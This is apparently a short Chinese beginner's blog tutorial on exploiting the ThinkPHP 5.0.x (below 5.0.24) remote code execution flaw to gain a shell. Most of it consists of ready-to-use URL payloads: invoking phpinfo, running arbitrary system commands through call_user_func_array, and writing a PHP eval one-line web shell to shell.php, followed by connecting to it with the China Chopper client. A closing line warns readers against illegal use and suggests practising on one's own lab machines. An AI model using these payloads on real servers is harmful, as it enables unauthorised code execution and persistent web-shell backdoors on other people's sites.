如何利用ThinkPHPv5的漏洞来getshell

影响范围

ThinkPHP 5.0系列 < 5.0.24

过程

查看信息

http://ip(url)/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=id(1,2,3之类的)

http://ip(url)/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=想执行的系统命令

爆错得到cms为tp5信息(一般情况下不太可能)
如何利用ThinkPHPv5的漏洞来getshell_第1张图片

http://ip(url)/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=1

查看phpinfo()
如何利用ThinkPHPv5的漏洞来getshell_第2张图片

http://ip(url)/index.php?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=想写入的东西

下面的已经的写了一句话

http://ip(url)/index.php?
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=shell.php&vars[1][1]= eval($_REQUEST["shell"]);?>

在这里插入图片描述写入成功

菜刀连接

因为一句话写到了shell.php 所以这里这里连接到shell.php就行了

如何利用ThinkPHPv5的漏洞来getshell_第3张图片

ps:小编也是刚入门,有不足的地方请大佬们多多指教
想对和我一样的小白们说:严禁用来干非法之事,搞自己的靶机不香吗

你可能感兴趣的:(如何利用ThinkPHPv5的漏洞来getshell)